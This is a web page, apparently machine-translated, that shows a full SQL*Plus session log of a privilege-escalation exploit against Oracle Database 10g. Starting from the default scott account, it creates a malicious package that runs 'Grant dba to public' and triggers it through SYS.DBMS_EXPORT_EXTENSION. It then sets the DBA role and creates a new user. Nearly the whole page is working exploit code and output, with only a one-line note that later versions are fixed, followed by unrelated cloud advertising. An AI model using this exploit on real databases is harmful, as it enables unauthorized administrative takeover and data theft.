The following is the hack process Microsoft Windows [version 5.2.3790] C: \ Documents and Settings \ Administratorsqlplus scott/tiger SQL * Plus: Release 10.2.0.1.0-Production on Monday September 23 23:07:17 2013 Copyright (c) 1982,200 5, Oracle. all rights reserved. connection
The following is the hack process.
Microsoft Windows [version 5.2.3790]
C: \ Documents ents and Settings \ Administrator> sqlplus scott/tiger
SQL * Plus: Release 10.2.0.1.0-Production on Monday September 23 23:07:17 2013
Copyright (c) 1982,200 5, Oracle. All rights reserved.
Connect:
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0-Production
With the Partitioning, OLAP and Data Mining options
SQL> select * from session_privs;
PRIVILEGE
--------------------------------------------------------------------------------
CREATE SESSION
CREATE TABLE
CREATE CLUSTER
CREATE SEQUENCE
CREATE PROCEDURE
CREATE TRIGGER
CREATE TYPE
CREATE OPERATOR
CREATE INDEXTYPE
Nine rows have been selected.
SQL> CREATE OR REPLACE
2 package mybadpackage authid current_user
3 IS
4 FUNCTION ODCIIndexGetMetadata (oindexinfo SYS. odciindexinfo, P3
5 VARCHAR2, p4 VARCHAR2, env SYS. odcienv)
6 return number;
7 END;
8/
The package has been created.
SQL> CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
2 IS
3 FUNCTION ODCIIndexGetMetadata (oindexinfo SYS. odciindexinfo, P3
4 VARCHAR2, p4 VARCHAR2, env SYS. odcienv)
5 RETURN NUMBER
6 IS
7 BEGIN
8 execute immediate 'Grant dba to public ';
9 RETURN 1;
10 EXCEPTION WHEN OTHERS THEN
11 execute immediate 'Grant dba to public ';
12 return 1;
13 END;
14 END;
15/
The package body has been created.
SQL> DECLARE
2 INDEX_NAME VARCHAR2 (200 );
3 INDEX_SCHEMA VARCHAR2 (200 );
4 TYPE_NAME VARCHAR2 (200 );
5 TYPE_SCHEMA VARCHAR2 (200 );
6 VERSION VARCHAR2 (200 );
7 NEWBLOCK PLS_INTEGER;
8 gmflags number;
9 v_Return VARCHAR2 (200 );
10 BEGIN
11 INDEX_NAME: = 'a1'; INDEX_SCHEMA: = 'Scott ';
12 TYPE_NAME: = 'mybadpackage'; TYPE_SCHEMA: = 'Scott ';
13 VERSION: = '10. 2.0.1.0 '; GMFLAGS: = 1;
14 v_Return: = SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA (
15 INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME
16 => TYPE_NAME,
17 TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
18 NEWBLOCK, GMFLAGS => GMFLAGS
19 );
20 END;
21/
The PL/SQL process is successfully completed.
SQL> create user qwe identified by qwe;
Create user qwe identified by qwe
*
Row 3 has an error:
ORA-01031: insufficient Permissions
SQL> set role dba
2/
Role set
SQL> create user qwe identified by qwe;
The user has been created.
SQL> select * from session_privs;
PRIVILEGE
--------------------------------------------------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
RESTRICTED SESSION
CREATE TABLESPACE
ALTER TABLESPACE
MANAGE TABLESPACE
DROP TABLESPACE
UNLIMITED TABLESPACE
CREATE USER
PRIVILEGE
--------------------------------------------------------------------------------
BECOME USER
.......
This security vulnerability was not found in oracle10.2.0.4 or later versions.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
